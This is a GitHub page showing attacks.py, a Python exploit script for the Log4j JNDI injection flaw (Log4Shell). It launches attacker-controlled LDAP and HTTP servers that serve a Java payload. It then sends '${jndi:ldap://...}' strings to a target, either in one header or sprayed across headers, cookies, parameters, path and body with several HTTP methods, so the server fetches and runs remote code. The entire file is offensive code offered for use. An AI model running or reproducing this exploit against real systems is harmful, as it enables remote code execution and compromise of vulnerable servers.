-
Notifications
You must be signed in to change notification settings - Fork 3
/
attacks.py
79 lines (62 loc) · 3.18 KB
/
attacks.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import multiprocessing
import requests
import string
from handlers import LDAB, HTTB
class Attack:
def __init__(self, target_url, lhost, java_payload, ldap_port="42063", http_port="42080"):
self.target_url = target_url
self.lhost = lhost
self.ldap_port = ldap_port
self.http_port = http_port
self.query_name = "/LegitimateJavaClass"
self.java_payload = java_payload
def ldap_runner(self):
print("starting ldap on {}".format(self.ldap_port))
LDAB(self.lhost, self.ldap_port, self.query_name, self.http_port, self.java_payload)
def http_runner(self):
print("starting http on {}".format(self.http_port))
HTTB(self.lhost, self.http_port, self.java_payload)
def server_processes(self):
self.ldap_process = multiprocessing.Process(target=self.ldap_runner)
self.ldap_process.start()
self.http_process = multiprocessing.Process(target=self.http_runner)
self.http_process.start()
def kill_server_processes(self):
print("exiting")
self.ldap_process.kill()
self.http_process.kill()
def trigger_vulnerability(self):
raise NotImplementedError()
class AttackWithHTTPHeader(Attack):
def trigger_vulnerability(self, header_name):
headers = {header_name: "${jndi:ldap://{LHOST}:{LPORT}{query_name}}".replace("{LHOST}", self.lhost).replace("{LPORT}", self.ldap_port).replace("{query_name}", self.query_name)}
requests.get(self.target_url, headers=headers)
def attack(self, header_name):
print("attacking")
self.server_processes()
self.trigger_vulnerability(header_name)
self.kill_server_processes()
class HTTPShotgun(Attack):
def trigger_vulnerability(self):
jndi = "${jndi:ldap://{LHOST}:{LPORT}{query_name}}".replace("{LHOST}", self.lhost).replace("{LPORT}", self.ldap_port).replace("{query_name}", self.query_name)
header_names = ["User-Agent", "X-Api-Version"]
headers = {name: jndi for name in header_names}
params = {name: jndi for name in string.ascii_letters}
params[jndi] = jndi
cookies = {jndi: jndi}
path = self.target_url + "/" + jndi
data = {name: jndi for name in string.ascii_letters}
data[jndi] = jndi
requests.get(url=path, data=data, headers=headers, cookies=cookies, params=params)
requests.get(url=self.target_url, data=data, headers=headers, cookies=cookies, params=params)
requests.post(url=path, data=data, headers=headers, cookies=cookies, params=params)
requests.post(url=self.target_url, data=data, headers=headers, cookies=cookies, params=params)
requests.put(url=path, data=data, headers=headers, cookies=cookies, params=params)
requests.put(url=self.target_url, data=data, headers=headers, cookies=cookies, params=params)
requests.delete(url=path, data=data, headers=headers, cookies=cookies, params=params)
requests.delete(url=self.target_url, data=data, headers=headers, cookies=cookies, params=params)
def attack(self):
print("attacking")
self.server_processes()
self.trigger_vulnerability()
self.kill_server_processes()